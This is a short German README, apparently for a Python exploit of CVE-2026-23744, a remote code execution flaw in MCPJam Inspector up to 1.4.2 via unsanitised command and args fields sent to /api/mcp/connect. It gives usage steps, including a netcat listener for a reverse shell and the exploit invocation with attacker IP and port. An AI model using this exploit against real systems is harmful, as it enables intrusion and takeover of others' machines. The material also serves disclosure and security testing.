
Python-Exploit für CVE-2026-23744, der durch manipulierte POST-Anfragen an den /api/mcp/connect-Endpunkt in MCPJam Inspector <= 1.4.2 eine Remote-Code-Ausführung ermöglicht.
Eine kritische RCE-Schwachstelle in MCPJam Inspector <= 1.4.2 ist möglich, wenn der Endpunkt /api/mcp/connect standardmäßig auf allen Netzwerkschnittstellen (0.0.0.0) lauscht und es versäumt, die vom Benutzer bereitgestellten Eingaben, die an die Parameter command und args im serverConfig-JSON-Objekt übergeben werden, ordnungsgemäß zu bereinigen.
Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine manipulierte POST-Anfrage an /api/mcp/connect sendet und so eine beliebige Befehlsausführung auf dem Zielsystem mit den Berechtigungen des MCPJam-Dienstes erreicht.
pip install request
sudo nc -lvnp <port>
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
Beispiel